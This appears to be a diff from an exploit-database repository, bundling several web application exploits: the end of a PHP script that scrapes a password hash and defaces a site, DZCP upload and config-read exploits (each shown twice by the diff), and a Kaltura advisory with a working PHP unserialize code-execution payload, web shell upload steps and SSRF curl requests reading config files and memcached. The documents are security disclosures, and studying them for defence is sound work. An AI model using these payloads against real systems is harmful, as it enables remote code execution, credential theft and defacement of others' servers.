preg_match("/>([0-9a-f]{32})</", $source, $password);
preg_match("/RE: (.*)\" class/", $source, $user);
if ($password[1])
{
echo "oo user " . $user[1] . "\n";
echo "oo password " . $password[1] . "\n\n";
echo "oo dafaced ...\n";
}
curl_close ($connection);
}
exploit_init();
exploit_header();
exploit_execute();
exploit_bottom();
?>
# milw0rm.com [2006-07-01]

100
platforms/php/webapps/2876.txt
View file

@ -1,50 +1,50 @@
S Y N O P S I S /
================='
-( access: remote severity: high )-
deV!L`z Clanportal allows nearly arbitrary files to be uploaded and stored on
the server's filesystem, which enables anyone, even without a user account, to
upload PHP code and execute it, leading to arbitrary code execution.
B A C K G R O U N D /
====================='
deV!L`z Clanportal (short "DZCP") is a suite of PHP scripts that allow anybody
to create a feature-rich website for her online gaming clan.
A F F E C T E D V E R S I O N S /
==================================='
verified on: 1.3.6
possibly vulnerable: <= 1.3.6
fixed in: 1.3.6.1
I M P A C T /
============='
The attacker can run own code on the web sever with the same privileges as DZCP
itself, enabling her to do almost anything from getting the MySQL password to
hosting own files and scripts or getting a shell on the server.
P R E R E Q U I S I T I E S /
============================='
the attacker needs a file that is both a valid JPEG or GIF file and valid
PHP (or probably other) code
A B O U T T H E A U T H O R /
================================='
Tim Weber, computer science student at the University of Mannheim, Germany,
currently looking for an internship at some IT security or pentesting company,
can be reached via e-mail: scy-adv-061124b at the host scytale.de.
P R O O F O F C O N C E P T /
================================='
Get a JPEG file, open it in a hex editor, add some PHP inside the EXIF data or
in similar places. Make sure PHP's getimagesize() does not return false and
that the file does not throw parse errors or the like when fed to PHP. Then:
curl -F 'file=@img.php;type=image/jpeg' 'http://<dzcp>/upload/index.php?action=userpic&do=upload'
Then check http://<dzcp>/inc/images/uploads/userpics/.php
# milw0rm.com [2006-12-01]
S Y N O P S I S /
================='
-( access: remote severity: high )-
deV!L`z Clanportal allows nearly arbitrary files to be uploaded and stored on
the server's filesystem, which enables anyone, even without a user account, to
upload PHP code and execute it, leading to arbitrary code execution.
B A C K G R O U N D /
====================='
deV!L`z Clanportal (short "DZCP") is a suite of PHP scripts that allow anybody
to create a feature-rich website for her online gaming clan.
A F F E C T E D V E R S I O N S /
==================================='
verified on: 1.3.6
possibly vulnerable: <= 1.3.6
fixed in: 1.3.6.1
I M P A C T /
============='
The attacker can run own code on the web sever with the same privileges as DZCP
itself, enabling her to do almost anything from getting the MySQL password to
hosting own files and scripts or getting a shell on the server.
P R E R E Q U I S I T I E S /
============================='
the attacker needs a file that is both a valid JPEG or GIF file and valid
PHP (or probably other) code
A B O U T T H E A U T H O R /
================================='
Tim Weber, computer science student at the University of Mannheim, Germany,
currently looking for an internship at some IT security or pentesting company,
can be reached via e-mail: scy-adv-061124b at the host scytale.de.
P R O O F O F C O N C E P T /
================================='
Get a JPEG file, open it in a hex editor, add some PHP inside the EXIF data or
in similar places. Make sure PHP's getimagesize() does not return false and
that the file does not throw parse errors or the like when fed to PHP. Then:
curl -F 'file=@img.php;type=image/jpeg' 'http://<dzcp>/upload/index.php?action=userpic&do=upload'
Then check http://<dzcp>/inc/images/uploads/userpics/.php
# milw0rm.com [2006-12-01]

20
platforms/php/webapps/3357.txt
View file

@ -1,10 +1,10 @@
# DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable
# Found by: Kiba
# Solution: Install security Fix!
# Exploit:
http://[SITE]/[PATH]/inc/filebrowser/browser.php?file=inc/mysql.php
Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php
# milw0rm.com [2007-02-21]
# DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable
# Found by: Kiba
# Solution: Install security Fix!
# Exploit:
http://[SITE]/[PATH]/inc/filebrowser/browser.php?file=inc/mysql.php
Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php
# milw0rm.com [2007-02-21]

108
platforms/php/webapps/39563.txt Executable file
View file

@ -0,0 +1,108 @@
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Kaltura Community Edition Multiple Vulnerabilities
Affected versions: Kaltura Community Edition <=11.1.0-2
PDF:
http://www.security-assessment.com/files/documents/advisory/Kaltura-Multiple-Vulns.pdf
+-----------+
|Description|
+-----------+
The Kaltura platform contains a number of vulnerabilities, allowing
unauthenticated users to execute code, read files, and access services
listening on the localhost interface. Vulnerabilities present in the
application also allow authenticated users to execute code by uploading
a file, and perform stored cross site scripting attacks from the Kaltura
Management Console into the admin console. Weak cryptographic secret
generation allows unauthenticated users to bruteforce password reset
tokens for accounts, and allows low level users to perform privilege
escalation attacks.
+------------+
|Exploitation|
+------------+
==Unserialize Code Execution==
The following PHP POC will generate an object that leads to code
execution when posted to an endpoint present on the server.
Authentication is not required.
[POC]
<?php
$init = "system('id;uname -a')";
$cmd = $init.".die()";
$len = strlen($cmd);
$obj="a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\0*\0_writers\";a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\0*\0_eventsToMail\";a:1:{i:0;i:1;}s:22:\"\0*\0_layoutEventsToMail\";a:0:{}s:8:\"\0*\0_mail\";O:9:\"Zend_Mail\":0:{}s:10:\"\0*\0_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\0*\0_inflector\";O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\0*\0_matchPattern\";s:7:\"/(.*)/e\";s:15:\"\0*\0_replacement\";s:$len:\"$cmd\";}s:20:\"\0*\0_inflectorEnabled\";b:1;s:10:\"\0*\0_layout\";s:6:\"layout\";}s:22:\"\0*\0_subjectPrependText\";N;}}};}";
$sploit = base64_encode($obj);
echo $sploit;
?>
------------
The Base64 encoded object generated above should be included in the
kdata section of the following curl request:
$curl
http://[HOST]/index.php/keditorservices/redirectWidgetCmd?kdata=$[sploit]
==Arbitrary File Upload==
Users authenticated to the KMC with appropriate privileges can upload
arbitrary files through the "Upload Content" functionality. This can be
used to upload a PHP web shell as an image file and gain command
execution. In order to excute the code, the on-disk path of the uploaded
file must be obtained, and then browsed to directly. Obtaining the
uploaded file's path can be achieved with the following command.
[POC]
$curl
http://[HOST]/index.php/keditorservices/getAllEntries?list_type=1&entry_id=0_3v2568rx
-b "[Valid Cookie]"
Directly accessing the path "url" returned by the above request will
result in the exceution of the uploaded php script.
$curl http://[HOST]/[URL PATH]
==SSRF / File Read (Limited)==
A limited number of files on the host can be read by passing a "file://"
protocol handler to a CURL call.
[POC]
$curl
http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=file://127.0.0.1/opt/kaltura/app/configurations/local.ini
Arbitrary IP addresses can be supplied, resulting in an SSRF issue. The
following POC uses the SSRF issue to send a command and retrieve
statistics from memcached listening on localhost, which is present in a
default Kaltura install.
[POC]
$curl
http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=http://127.0.0.1:11211
-m 2 --data $'b=set nl 0 60 4\n\n\n\n\n'
$curl
http://[HOST]/html5/html5lib/v2.34/simplePhpXMLProxy.php?url=http://127.0.0.1:11211
--data "c=get nl&d=stats&e=quit"
+----------+
| Solution |
+----------+
Upgrading to the most recent version of Kaltura (11.7.0-2) will fix the
majority of these issues. No fixes are available for some of the issues
disclosed, so carefully firewalling off the Kaltura interface is
recommended.
+------------+
| Additional |
+------------+
A disclosure timeline, further information and additional less critical
vulnerabilities are available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/Kaltura-Multiple-Vulns.pdf